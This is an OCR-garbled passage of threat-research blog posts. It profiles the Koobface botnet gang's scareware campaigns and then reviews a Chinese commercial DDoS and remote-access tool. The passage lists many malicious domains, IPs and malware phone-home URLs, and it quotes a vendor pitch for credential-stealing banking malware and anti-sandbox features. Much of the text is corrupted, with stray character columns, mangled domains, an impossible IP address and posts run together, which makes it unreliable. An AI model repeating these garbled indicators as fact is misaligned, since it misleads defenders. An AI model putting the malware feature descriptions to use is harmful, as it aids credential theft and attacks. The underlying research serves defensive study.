rently responding to, is an active [10]client-side exploits serving campaign using the YES 
malware exploitation kit (lzabslwvn538n4i5tcjl.com - Email: michaeltycoon@gmail.com). 


| can go on forever. 


3435 


Stan Up | Quickies 


DIG: T 


Video posted by ... Hidden Camera ... 


Video Responses: 10 Text Comments: 70 


Would you like to comment? 


02. [11]Despite their steady revenue flow from sales of scareware, the gang once used trial 
software to take a screenshot of a YouTube video 


- Koobface gang: what’s reason to buy software just for one screenshot? 


No reason at all, | guess that’s also the reason behind the temporary change in [12]scareware 
URIs to include GREED within the file name. 
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03. [13]The Koobface gang was behind the malvertising attack the hit the web site of 
the New York Times in September 


- Koobface gang: no connection 


You wish, you wish. 


In fact, several of the recent high-profile malvertising campaigns that targeted major 
Web 2.0 properties, can be also traced back to their infrastructure. Now, whether they are 
aware of the true impact of the malvertisement campaign, and whether they are intentionally 
pushing it at a particular web site remains unknown. 


The fact is that, the exact [14]same domain that was used in the NYTimes redirection, 
was also back then embedded on all of the Koobface infected hosts, in order to serve 
scareware. 


04. [15]The gang conducted a several hours experiment in November, 2009 when for 
the first time ever client-side exploits were embedded on Koobface-serving compromised 
hosts 


- Koobface gang: :) 


He who smiles last, smiles best. 


05. [16]The Koobface gang was behind the massive (1+ million affected web sites) 
scareware serving campaign in November, 2009 


- Koobface gang: :) 


Since they’re admitting their involvement in point 5, they also don’t know/forget that 
one of the many ways the [17]connection between the Koobface gang and massive blackhat 
SEO campaign was established in exactly the same way as the one in their involvement in the 
NYTimes malvertising campaign. Convenient denial of involvement in high-profile campaigns 
means nothing when collected data speaks for itself. 
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06. [18]The Koobface Gang Monetizes Mac OS X Traffic through adult dating/Russian 
online movie marketplaces 


- Koobface gang: :) 


Read more on the practice - " [19]How the Koobface Gang Monetizes Mac OS X Traffic 


Our team, so often called “Koobface Gang”. expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


® Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

®@ Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of 
course analyzing software under VM Ware: 


®@ Trend Micro (http: //trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool document (with three parts!) describing all our mistakes ve've ever made; 


® Cisco for their 3rd place to our software in their annual “working groups awards"; 
* Soren Siebert with his great article; 


@ Hundreds of users who send us logs, crash reports, and vish-lists. 


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us 
move ahead, And we've moved, And will move. Improving their security systern, 


By the way, we did not have @ cent using Twitter's traffic, But many security issues tell the world we did. They are wrong. 

As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Our software did not ever steal credit card or ontine bank information, passwords or any other confidential data, And WILL NOT EVER. 
As for the crashes... We are really sorry. We work on it :) 

Wish you @ good luck in new year and... Merry Christmas to you! 


Always yours, “Koobface Gang”. 


07. [20]JAli Baba and 40 LLC a.k.a the Koobface gang greeted the security community 
on Christmas 


- Koobface gang: it was ‘ali baba & 4’ originally. you should be more careful 


Since the original [21]Ali Baba had 40 thieves with him, not 4, the remaining 36 can be 
best described as the cybecrime ecosystem’s stakeholders earning revenues and having their 
business models scaling, thanks to the involvement of the Koobface botnet. 
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Network Location: 21. 2009 - Oct 21.2 
pid al Oct 21, 2009 - Oct 21, 2009 


7,000 cber 21, 2000 7,000 


October 21, 2009 


6,705 visits came from this network location via 1 network locations 


Goal Conversion Fle =lt iii 


Visits Pages/Visit Avg. Time on Site % New Visits Bounce Rate 

6.705 1.00 > 00:00:00 99.99% 99.96% 

% of Site tal 93.63 te Avg 1,06 (5.75%) ‘ 00:00; 16 (-99.44%) te Avg 97.24% (2.383%) te Avg 98.31% (1.67%) 
Dimension Metwork Location ¥ Visite | Pages/Vist Avg. Tine on Ste % New Vists Bounce Riste 

1. facebook inc 6,705 100 » 00.00.00 99.59% 99.95% 


08. [22]The Koobface gang once redirected Facebook’s IP space to my personal blog 


- Koobface gang: heh 


Read more on the topic - " [23]Koobface Botnet Redirects Facebook’s IP Space to my 
Blog ". 


09. [24]The gang is experimenting with alternative propagation strategies, such as for 
instance Skype 


- Koobface gang: strange error. there’re no experiments on that 


Hmm, who should | trust? [25]SophosLabs and [26]TrendMicro or the Koobface gang? 
SophosLabs and TrendMicro or the Koobface gang? Sophos Labs and TrendMicro or....well you 
get the point. Of course there isn’t, now that’s is publicly known it’s in the works. 
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CRUSADE-AFFILIATES 


V4+0 


10. [27]The gang is monetizing traffic through the Crusade Affiliates scareware net- 
work 


- Koobface gang: maybe. not 100 % sure 


They don’t know where they get all the money by being pushing scareware? How con- 
venient. 


When data and facts talk, even "Cyber Jesus" listens. Read more on the monetization 
model - " [28]Koobface Botnet’s Scareware Business Model "; " [29]Koobface Botnet’s 
Scareware Business Model - Part Two ". 
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The Koobface botnet is currently pushing scareware through 2gig-antivirus.com?mid=312 
&code=4db12f &d=1 &s=2 - 195.5.161.210 - Email: test@now.net.cn 


Qwed-antispyware com 


l2netantispy com + 
gig-anthirus.com r 
lwedantwirus. com ry 
209b-artivirus.com A 


29!p antirus.com 
2web-amispycom 
2Qwedantirus com 
30gb-arvirus.com 
Jwed-antispyware com 
Swedantwirus. com 


409b-anenvirus.com s C 1958161210 > HE pe 19551610724 —Ah-pe 531252 


4web-anispycom 

4wedantvirus com | 
SO0gb-arvivirus. com y 

i 

Sweb-anispycom 

60gb-anmirus.com 

Oweb-anispycom 

Twed-antispyware com 
cwebanthvirus.com 
Qwedantvirus com 


ewedantvirus com 


noval-antspyware.com 


Parked on the same IP (195.5.161.210, AS31252, STARNET-AS StarNet Moldova) are also: 
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Oweb-antispyware.com - Email: test@now.net.cn 
12netantispy.com - Email: test@now.net.cn 
13netantispy.com - Email: test@now.net.cn 
14netantispy.com - Email: test@now.net.cn 
16netantispy.com - Email: test@now.net.cn 
lanetantispy.com - Email: test@now.net.cn 
lbnetantispy.com - Email: test@now.net.cn 
lgb-scanner.com - Email: test@now.net.cn 
lgig-antivirus.com - Email: test@now.net.cn 
lwebantivirus.com - Email: test@now.net.cn 
20gb-antivirus.com - Email: test@now.net.cn 
2gb-scanner.com - Email: test@now.net.cn 
2gig-antivirus.com - Email: test@now.net.cn 
2mb-scanner.com - Email: test@now.net.cn 
2web-antispy.com - Email: test@now.net.cn 
2webantivirus.com - Email: test@now.net.cn 
30gb-antivirus.com - Email: test@now.net.cn 
3gb-scanner.com - Email: test@now.net.cn 
3gig-antivirus.com - Email: test@now.net.cn 
3mb-scanner.com - Email: test@now.net.cn 
3web-antispy.com - Email: test@now.net.cn 
3web-antispyware.com - Email: test@now.net.cn 
3webantivirus.com - Email: test@now.net.cn 
40gb-antivirus.com - Email: test@now.net.cn 


4gb-scanner.com - Email: test@now.net.cn 
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4gig-antivirus.com - Email: test@now.net.cn 
4mb-scanner.com - Email: test@now.net.cn 
4web-antispy.com - Email: test@now.net.cn 
4webantivirus.com - Email: test@now.net.cn 
50gb-antivirus.com - Email: test@now.net.cn 
5gb-scanner.com - Email: test@now.net.cn 
5gig-antivirus.com - Email: test@now.net.cn 
5mb-scanner.com - Email: test@now.net.cn 
5web-antispy.com - Email: test@now.net.cn 
5webantivirus.com - Email: test@now.net.cn 
60gb-antivirus.com - Email: test@now.net.cn 
6mb-scanner.com - Email: test@now.net.cn 
6web-antispy.com - Email: test@now.net.cn 
7web-antispyware.com - Email: test@now.net.cn 
aweb-antispyware.com - Email: test@now.net.cn 
awebantivirus.com - Email: test@now.net.cn 
cwebantivirus.com - Email: test@now.net.cn 
dwebantivirus.com - Email: test@now.net.cn 
ewebantivirus.com - Email: test@now.net.cn 


novascanner4.com - Email: test@now.net.cn 


- setup.exe - [30]Gen:Variant.Koobface.2; W32.Koobface - Result: 15/40 (37.5 %) 


- MalvRem _312s2.exe - [31]W32/FakeAlert.5!Maximus; Trojan.Win32.FakeAV - Result: 10/41 
(24.4 %) which once executed phones back to: 


- slsystem.com/download/winlogo.bmp - 911.213.157.104, AS13618, CARONET-AS - Email: 
3443 


contact@privacy-protect.cn 


- networkil0.com - 91.213.217.106, AS42473, ANEXIA-AS - Email: contact@privacy-protect.cn 


UPDATED: Wednesday, May 19, 2010: 


The current redirection taking place through the embedded link on Koobface infected 
hosts, takes place through: 


www3.coantys-48td.xorg.pl - 188.124.5.66 - AS44565, VITAL TEKNOLO]I 


- wwwl.fastsearch.cz.cc - 207.58.177.96 - AS25847, SERVINT Servint Corporation 


Detection rates: 


- setup.exe - [32]Win32/Koobface.NCX; Gen:Variant.Koobface.2 - Result: 13/41 (31.71 
%) 


- packupdate build107 2039.exe - [33]W32/FakeAV.AM!genr; Mal/FakeAV-AX - Result: 
8/41 (19.52 %) 


Upon execution, the scareware sample phones back to: 


updatel.myownguardian.com - 94.228.209.223, AS47869, NETROUTING-AS - Email: 
gkook@checkjemail.nl 


update2.myownguardian.net - 93.186.124.92, AS44565, VITAL TEKNOLOJI - Email: 
gkook@checkjemail.nl 


UPDATED Moday, May 24, 2010: The following Koobface scareware domains/redirectors 
have been pushed by the Koobface gang over the pat 7 days. All of them continue using the 
services of AS31252, STARNET-AS StarNet Moldova at 195.5.161.210 and 195.5.161.211. 
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Oweb-antispyware.com - Email: test@now.net.cn 
12netantispy.com - Email: test@now.net.cn 
13netantispy.com - Email: test@now.net.cn 
14netantispy.com - Email: test@now.net.cn 
15netantispy.com - Email: test@now.net.cn 


16netantispy.com - Email: test@now.net.cn 
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lanetantispy.com - Email: test@now.net.cn 
lbnetantispy.com - Email: test@now.net.cn 
lcnetantispy.com - Email: test@now.net.cn 
ldnetantispy.com - Email: test@now.net.cn 
leliminatemalware.com - Email: test@now.net.cn 
leliminatespy.com - Email: test@now.net.cn 
leliminatethreats.com - Email: test@now.net.cn 
leliminatevirus.com - Email: test@now.net.cn 
lenetantispy.com - Email: test@now.net.cn 
lwebantivirus.com - Email: test@now.net.cn 
lwebfilter1000.com - Email: test@now.net.cn 
lwww-antispyware.com - Email: test@now.net.cn 
lwww-antivirus.com - Email: test@now.net.cn 
20gb-antivirus.com - Email: test@now.net.cn 
2eliminatemalware.com - Email: test@now.net.cn 
2eliminatevirus.com - Email: test@now.net.cn 
2web-antispy.com - Email: test@now.net.cn 
2webantivirus.com - Email: test@now.net.cn 
2www-antispyware.com - Email: test@now.net.cn 
2www-antivirus.com - Email: test@now.net.cn 
30gb-antivirus.com - Email: test@now.net.cn 
3web-antispy.com - Email: test@now.net.cn 
3web-antispyware.com - Email: test@now.net.cn 
3webantivirus.com - Email: test@now.net.cn 


3www-antispyware.com - Email: test@now.net.cn 
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3www-antivirus.com - Email: test@now.net.cn 
40gb-antivirus.com - Email: test@now.net.cn 
4web-antispy.com - Email: test@now.net.cn 
4webantivirus.com - Email: test@now.net.cn 
4www-antispyware.com - Email: test@now.net.cn 
4www-antivirus.com - Email: test@now.net.cn 
5web-antispy.com - Email: test@now.net.cn 
5webantivirus.com - Email: test@now.net.cn 
5www-antispyware.com - Email: test@now.net.cn 
5www-antivirus.com - Email: test@now.net.cn 
60gb-antivirus.com - Email: test@now.net.cn 
6web-antispy.com - Email: test@now.net.cn 
7web-antispyware.com - Email: test@now.net.cn 
a30windows-scan.com - Email: test@now.net.cn 
a40windows-scan.com - Email: test@now.net.cn 
a50windows-scan.com - Email: test@now.net.cn 
a50windows-scan.com - Email: test@now.net.cn 
a60windows-scan.com - Email: test@now.net.cn 
americanscanner.com - Email: test@now.net.cn 
aresearchsecurity.com - Email: test@now.net.cn 
awebantivirus.com - Email: test@now.net.cn 
barracudal10.com - Email: test@now.net.cn 
beguardsystem.com - Email: test@now.net.cn 
beguardsystem2.com - Email: test@now.net.cn 


bewareofthreat.com - Email: test@now.net.cn 


3447 


bewareofydanger.com - Email: test@now.net.cn 
bprotectsystem.com - Email: test@now.net.cn 
bwebantivirus.com - Email: test@now.net.cn 
choclatescanner2.com - Email: test@now.net.cn 
cleanerscanner2.com - Email: test@now.net.cn 
cnn2scanner.com - Email: test@now.net.cn 
cprotectsystem.com - Email: test@now.net.cn 
cwebantivirus.com - Email: test@now.net.cn 
dacota4security.com - Email: test@now.net.cn 
defencyresearch.com - Email: test@now.net.cn 
defenseacquisitions.com - Email: test@now.net.cn 
defenseacquisitions.com - Email: test@now.net.cn 
defensecapability.com - Email: test@now.net.cn 
dprotectsystem.com - Email: test@now.net.cn 
dwebantivirus.com - Email: test@now.net.cn 
eliminatespy.com - Email: test@now.net.cn 
eliminatethreat.com - Email: test@now.net.cn 
eliminatethreats.com - Email: test@now.net.cn 
eprotectsystem.com - Email: test@now.net.cn 
ewebantivirus.com - Email: test@now.net.cn 
fantasticscan2.com - Email: test@now.net.cn 
fortescanner.com - Email: test@now.net.cn 
four4defence.com - Email: test@now.net.cn 
fprotectsystem.com - Email: test@now.net.cn 


house2call.com - Email: test@now.net.cn 
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house4call.com - Email: test@now.net.cn 
ibewareofdanger.com - Email: test@now.net.cn 
iresearchdefence.com - Email: test@now.net.cn 
Idefenceresearch.com - Email: test@now.net.cn 
micro2smart.com - Email: test@now.net.cn 
micro4smart.com - Email: test@now.net.cn 
micro6smart.com - Email: test@now.net.cn 
necessitydefense.com - Email: test@now.net.cn 
nolongerthreat.com - Email: test@now.net.cn 
nova3-antispyware.com - Email: test@now.net.cn 
nova4-antispyware.com - Email: test@now.net.cn 
nova5-antispyware.com - Email: test@now.net.cn 
nova7-antispyware.com - Email: test@now.net.cn 
nova8-antispyware.com - Email: test@now.net.cn 
nova-antivirusl.com - Email: test@now.net.cn 
nova-antivirus2.com - Email: test@now.net.cn 
novascanner2.com - Email: test@now.net.cn 
nova-scanner2.com - Email: test@now.net.cn 
novascanner3.com - Email: test@now.net.cn 
nova-scanner3.com - Email: test@now.net.cn 
novascanner4.com - Email: test@now.net.cn 
nova-scanner4.com - Email: test@now.net.cn 
novascanner5.com - Email: test@now.net.cn 
nova-scanner5.com - Email: test@now.net.cn 


novascanner7.com - Email: test@now.net.cn 
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nova-scanner7.com - Email: test@now.net.cn 
onguardsystem2.com - Email: test@now.net.cn 
overllscanner.com - Email: test@now.net.cn 
pcguardsystem2.com - Email: test@now.net.cn 
pcguardsystems.com - Email: test@now.net.cn 
pcpiscanner.com - Email: test@now.net.cn 
pitstopscan.com - Email: test@now.net.cn 
protectionfunctions.com - Email: test@now.net.cn 
protectionmeasure.com - Email: test@now.net.cn 
protectionmethods.com - Email: test@now.net.cn 
protectionoffices.com - Email: test@now.net.cn 
protectionprinciples.com - Email: test@now.net.cn 
protectsystema.com - Email: test@now.net.cn 
protectsystemc.com - Email: test@now.net.cn 
protectsystemd.com - Email: test@now.net.cn 
protectsysteme.com - Email: test@now.net.cn 
protectsystemf.com - Email: test@now.net.cn 
researchdefence.com - Email: test@now.net.cn 
researchysecurity.com - Email: test@now.net.cn 
spywarekillera.com - Email: test@now.net.cn 
spywarekillerc.com - Email: test@now.net.cn 
spywarekillerd.com - Email: test@now.net.cn 
spywarekillere.com - Email: test@now.net.cn 
spywarekillerr.com - Email: test@now.net.cn 


spywarekillerz5.com - Email: test@now.net.cn 
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stainsscanner2.com - Email: test@now.net.cn 
stop20attack.com - Email: test@now.net.cn 
tendefender2.com - Email: test@now.net.cn 
thelosers2010.com - Email: test@now.net.cn 
trivalsoftware.com - Email: test@now.net.cn 
unstoppable2010.com - Email: test@now.net.cn 
unstoppable2010.com - Email: test@now.net.cn 
use6defence.com - Email: test@now.net.cn 
viruskiller3a.com - Email: test@now.net.cn 
viruskiller4a.com - Email: test@now.net.cn 
viruskiller5a.com - Email: test@now.net.cn 
viruskiller6a.com - Email: test@now.net.cn 
webfilter100.com - Email: test@now.net.cn 
webfilter999.com - Email: test@now.net.cn 
winguardsystem.com - Email: test@now.net.cn 
yourguardsystem.com - Email: test@now.net.cn 
yourguardsystem2.com - Email: test@now.net.cn 
z22windows-scan.com - Email: test@now.net.cn 
z23windows-scan.com - Email: test@now.net.cn 
z25windows-scan.com - Email: test@now.net.cn 
z27windows-scan.com - Email: test@now.net.cn 


zaresearchsecurity.com - Email: test@now.net.cn 


Detection rates: 


- setup.exe - [34]Net-Worm:W32/Koobface.HN; Mal/Koobface-D - Result: 11/41 (26.83 %) 
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- avdistr 312.exe - [35]Trojan.FakeAV!gen24; Trojan.FakeAV - Result: 8/41 (19.52 %) 


Upon execution phones back to: 
slsystem.com/download/winlogo.bmp - 91.213.157.104 - Email: contact@privacy-protect.cn 


accsupdate.com/?b=103s1 - 193.105.134.115 - Email: contact@privacy-protect.cn 


Previous parked on 91.213.217.106, AS42473, ANEXIA-AS now responding to 193.105.134.115, 
AS42708, PORTLANE: 


networkil0.com - Email: contact@privacy-protect.cn 
winsecuresoftorder.com - Email: contact@privacy-protect.cn 
time-zoneserver.com - Email: contact@privacy-protect.cn 


1blacklist.com - Email: contact@privacy-protect.cn 


In order to understand the importance of profiling Koobface gang’s activities, consider 
going their their underground multitasking campaigns in the related posts. 


Related Koobface botnet/Koobface gang research: 

[36]From the Koobface Gang with Scareware Serving Compromised Sites 
[37]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
[38]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
[39]10 things you didn’t know about the Koobface gang 


[40]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface 
Gang 


[41]How the Koobface Gang Monetizes Mac OS X Traffic 
[42]The Koobface Gang Wishes the Industry "Happy Holidays" 
[43]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 


[44]Koobface Botnet Starts Serving Client-Side Exploits 
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[45]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[46]Koobface Botnet’s Scareware Business Model - Part Two 

[47 ]Koobface Botnet’s Scareware Business Model - Part One 
[48]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[49]New Koobface campaign spoofs Adobe’s Flash updater 

[50]Social engineering tactics of the Koobface botnet 

[51]Koobface Botnet Dissected in a TrendMicro Report 

[52]Movement on the Koobface Front - Part Two 

[53]Movement on the Koobface Front 

[54]Koobface - Come Out, Come Out, Wherever You Are 


[55]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [56]Dancho Danchev’s blog. Follow him 
[57]Jon Twitter. 


ttp://www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 


ttp://www.zdnet.com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452 


. http: //ddanchev. blogspot .com/2009/12/koobface- gang-wishes-industry-happy. htm 


ttp://www.zdnet .com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452 


_Eiep:/ tog: cicetorensice.cou/Tprsid 
ttp://www.zdnet.com/blog/security/click-fraud-facilitating-bahama-botnet-steals-ad-revenue-from-google/4 
7. http://www.zdnet .com/blog/security/cybercriminals-promoting-malware-friendly-search-engines/3333?p=333 

5 
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10. 

11. http://www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 

12. 

13. http://www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 
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15. http://www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 
16. http://www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 


17. bttp://ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 


18. http://www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 


19. http://ddanchev. blogspot .com/2010/02/how-koobface-gang-monetizes-mac-os-x.htm 


20. http://www.zdnet .com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452 


21. http://en.wikipedia.org/wiki/Ali_Baba 
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. http: //www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 


. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 


. http: //www.zdnet .com/blog/security/10-things- you-didnt- know-about-the-koobface-gang/5452 


. http://www. sophos.com/blogs/sophoslabs/v/post/748 


. http: //blog.trendmicro.com/new-koobface-variant-targets-skype/ 
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. http: //www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 
28. http: //ddanchev. blogspot .com/2009/09/koobface 


ion 
° 
ct 
B 
0) 
ct 
n 


ion 
=a 
ct 
B 


n n 
(9) (9) 
@ ||» 
AiR 
Oo oO 
2 |= 
p || 9 
AiR 
Oo oOo 
Se ie 
n n 
He) 
Bip 
Oo oOo 
n n 
n n 


NO 
o 
ct 
ct 
‘oO 
~ 
~ 
Qa 
Qa 
@ 
j=) 
a) 
pb 
(0) 
<q 
ion 
# 
fe} 
0a 
n 
ue] 
° 
ct 
fa) 
° 
5B 
~ 
N 
Oo 
fo} 
oo 
~ 
BR 
i 
~ 
yr 
fo} 
fo) 
o 
Fh 
p@ 
fa) 
(0) 


BR 


ion 
° 
ct 
B 
0) 
ct 
n 


ion 
=a 
ct 
B 


30. http://www.virustotal.com/analisis/193880563e8af90c505e3666d0714bc3f08ef 6c766c14c292324d6dffeffea90- 1274 
2733 


31. http://www.virustotal.com/analisis/462c01a58bb0c14183b9ca29c308723229b309dc43f4be88dc0d£52a5ba678ef- 1274 
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2. http://www.virustotal.com/analisis/43980c45a2294b28bf 56deb2a0ecf 6128e88443701cc452b4523ea1396e445b2- 12742 
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3. http: //www.virustotal.com/analisis/7251f88756f bbe7f662ad6a9a3d4f fd26a2bb6ef cede 10dd9d6027ed9e513932- 12742 
9242 


4. http://www.virustotal.com/analisis/0e7c5453bf bde52ee760c91086ec 12d61d67737eeceea2f dab0d063a7b582910- 1274 
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36. http: //ddanchev. blogspot . com/2010/05/from-koobface-gang-with-scareware. html 

37. http: //ddanchev. blogspot .com/2010/04/dissecting-koobface-gangs-latest.htm 

38. http: //ddanchev. blogspot .com/2010/03/koobface-redirectors-and-scareware.htm 


. http: //www.zdnet .com/blog/security/10-things- you-didnt-know-about-the-koobface-gang/5452 


40. http: //ddanchev. blogspot .com/2010/02/diverse-portfolio-of-scarewareblackhat .htm 
41. http: //ddanchev. blogspot .com/2010/02/how- koobface-gang-monetizes-mac-os-x.htm 
42. http: //ddanchev. blogspot .com/2009/12/koobface-gang-wishes-industry-happy.htm 
43. http: //ddanchev. blogspot. com/2009/12/koobface-friendly-riccom-1td-as29550 .htm 
44. http: //ddanchev.blogspot .com/2009/11/koobface-botnet-starts-serving-client.htm 

. http: //ddanchev.blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
46. http: //ddanchev. blogspot. com/2009/11/koobface-botnets-scareware-business.htm 
47. http: //ddanchev.blogspot .com/2009/09/koobface-botnets-scareware-business.htm 
48. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
49. http: //blogs.zdnet .com/security/?p=4594 
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51. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 
52. http: //ddanchev. blogspot .com/2009/08/movement- on-koobface-front-part-two.htm 

. http: //ddanchev. blogspot . com/2009/08/movement- on-koobface-front .htm 
54. http: //ddanchev. blogspot .com/2009/07/koobface- come-out-come-out-—wherever-you.htm 
55. http: //ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter .htm 
56. http://ddanchev.blogspot.com/ 
57. bttp://twitter.com/danchodanche 
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6.5.14 Inside a Commercial Chinese DIY DDOS Tool (2010-05-26 13:55) 


“Online Host Host ODOS Attack Dummyattack Self-attack Update IP Settings buildserver Quit 
Conventional attack: Web site attacks: Special attacks: Combined attack: New attack: 

[O1JSYN Flood [O2]ICMP Flood [O7]Get flood-free [10]Games attack [13]SYHHUDP Flood (16]Fin_ ait! Attack 

[O3]UDP Flood [04]UDPDebris [O8]CCVari ation ({11]Routingattacks [14]ICMP+TCP Flood (17) Fin_¥ait2 Attack 


[OSJTCP Flood [O6)TCPMulti-join [OS)HTTPEmpty GET (i2]IHybrid attack [IS]VDP +TCP Connect [18]Established Attack 
Manually select the console mode (task 0) 


Target: http://www. target. com/show. asp7id=123 New on-line attacks Attack 
Port: 80 Type: 08 *| Thread: 10 >| Quantity: 100 > On-line list of host 


Automatically selects the host mode (unlimited mission mode) 


Type:|o3 -»| Threastio > |Amount:/100 > | Target: www. target! com Port: 60 Add a goal | 
> ¥ - 
IP [#] UpdatelP [#] Delete the target 


Greek Network UpdateIP 


Account: | ms~200*9 VIP 


Password Ee 


domain: www. 3322. org Attack-Target 


Your IP: 192. 168. 1. 253 


Targets can be IP / DNS / web 
the need for polling URL as a parameter. 


DHS Example: wew. baidu. com IP Exemple: 202.199.24.35 
URL Example: http: //«ww. abc. com/show. asp?id=123 


http://www. abe. com/index. htm 
http://www. abc. com/ 


Ate eto as 


One of the most commonly used tactics by shady online enterprises wanting to position them- 
selves as legitimate ones ([1]Shark2 - RAT or Malware?), is to promote malicious software or 
Denial of Service attack tooks, as remote access control tools/stress testing tools. 


Chinese "vendors" of such releases are particularly interesting, since their front pages 
always position the tool as a 100 % legitimate one, whereas going through the documentation, 
and actually testing its features reveals its true malicious nature. Moreover, once the vendor 
starts trusting you - like the one whose DDoS tool is profiled in this post - you’re given access 
to the private section of their forum, where they are directly pitching you with DDoS for hire 
propositions, starting from $100 for 24 hours of non-stop flood. 


¢ Related post: [2] Massive SQL Injection Attacks - the Chinese Way 


In this post I’ll review what’s currently being promoted as "The World’s Leading DDoS Testing 
System", which is basically an improved version of a well known "Netbot Attacker", an old 
school release whose source code ([3]Localizing Open Source Malware; [4]Custom DDoS Ca- 
pabilities Within a Malware; [5]Custom DDoS Attacks Within Popular Malware Diversifying) is 
greatly favored by Chinese hacktivists and script kiddies, based on the multiple modifications 
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they’ve introduced in it using the original source code. 


Interestingly, the "vendor" is offering value-added services in the form of managed com- 
mand and control server changes, the typical managed binary obfuscation, as well as custom 
features, removal of features in an attempt to decrease the size of the binary, but most 
importantly, they use differentiated pricing methods for their tool. Educational institutions, 
small businesses and home office clients can get special prices. 


¢ Why would the vendor include anti sandboxing capabilities in the latest version of the 
tool? 


¢ Why would the vendor also include P2P spreading and USB spreading modules? 


Because the tool is anything but your typical stress testing tool. 


Perhaps, one of the most important developments regarding this vendor, is that this is 
among the few examples that I’m aware of where [6]Chinese hackers known not to care 
about anything else but virtual goods, are vertically integrating by experimenting with 
early-state banking malware. 


An excerpt from the banking experiment: 

"MS-recorder to wear all the safety test shows the major B2C online banking security controls. 
Received after the first test colt extracting file, which has ma.exe procedures. As the tests 
are over. Please turn off antivirus software and security software testing. . . 


Wear all safety major B2C online banking security controls currently supports more 
than can be intercepted more than 160 online online payment platform And major 
online banking. After running ma.exe can log on to the respective online banking program 
Alipay paypal or procedures to test, test and test interception of information stored in the pony 


The same directory, Test will generate Jlz-1, Jlz-2, Jlz-3 .... folder, such files in the folder 
will be 1.bmp, 2.omp, 3.omp ... picture, or there txt Notepad, view the. txt and picture, get the 
interception of data and information. Test window will prompt pony run, test interception of 
information larger, there is no written function. To solve the above problem, please purchase 
the official version, run silent, run automatically delete itself, no process at startup, had all 
killed, the interception of information 


Expected small size, with letters function. VIP version of the generator purchase one 
year of free updates, free to kill three months to buy the colt package. Set the FTP trans- 
mission method to send the interception of STMP FTP. Perfect information theft can steal all 
the passwords and related information, such as: QQ, ICQ, Yahoo Messenger, Vicg, OutLook, 
FlashFXP, PayPal, E-mail and paypal (no security control), Legend, mercenary legend, Journey 
to the West, etc. (include account number, area and other relevant information), of course, 
the same information on the page steal, such as: mail, forums, close protection, and other 
(including user name, password and other related information), or even playing in the dia- 
gram, Password chip can, because it can record the keyboard and mouse actions. It is worth 
mentioning that, no matter what way you enter the password (such as Paste from somewhere, 
then paste the part of the input part, the number before the O, deliberately enter the wrong 
password first and then delete the wrong part, etc.) Adopted the "filters" which makes stealing 
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the contents do not appear out of "junk" in precise steal ... 


Clearly, these folks are not just inspired to continue introducing new features within the 
but are starting to realize the potential of the crimeware market, with the vendor 
itself representing a good example on how once it was allowed to continue operations, it’s 
naturally evolving in the worst possible direction. The author of ZeuS, however, shouldn't feel 


tool, 


endangered in any way. 


Screenshots of the DIY DDoS Platform, including the multiple versions offers, VIP, sam- 


ple custom made etc.: 


—. 
Progran(®) Options@) State(V) Help @ 


LocallP 192.168.1.253 


The correct password." 


File Screen Audio VideoView 


On-line TAN IP Lay IP 


UpdatelP 


ConputerNane 


Build 


cs 


Remote Management (S) 


Pop news About 


cry 


$B bag 


Program start-up tine: O9Yearllaoon3D 


Update () 


Document Management 
Screen Monitor () 
Remote Terminal (J) 
Keylogger (K) 
System Settings Q) 
Video Surveillance (V) 
Voice Monitor (it) 
Download Running @) 


Open 3389 port Q) 
System Settings (Q) 
HITP proxy Q) 
FIP/DNs Update (@) 
DDOS Attack (Q) 
Password interception (Q) 
Additional Options (Q) 

Destructive virus (0) 

Visi t¥ebsite ¥) 
Clear Log €) 

Change Notes @) 


Select All (A) 
Deselect WD) 


Exit 


Ping VideoStat Versio: Location 


+ atte 


Bullet ¥indow Set (i) 
) Destruction of the hard disk(@) 


) OO kb/s Listen port: S0€ On-line host: 1 


SES ss 
Bap ter : 


3457 


tr. 
2 


Progran(F) Options (0) State) | © Build server-side e Oo e 


8@oe 


File Screen Audio Exit 
On-line FAN IP LAN IP deoStat Version 
Bo 127.0.0.1 127.0.0. ME 1.0 


Deserts 
DLiName WetCreate dll 


Antidebugging server-side protection of 
©) Anti sandbowe © Anti vitualpc 


© Anti vinware © Anti vitualbox 

© AntAmbss © Anti Theeatexpert 
© Ant joebox ©: Other 

Powerful online. Additional features advanced VIP options 


© Persistent connections SSDT 
© Forced Insert © USB Intranet infection 


© 'p2p spreades infection © Rootkit Super Hidden (VIP) 


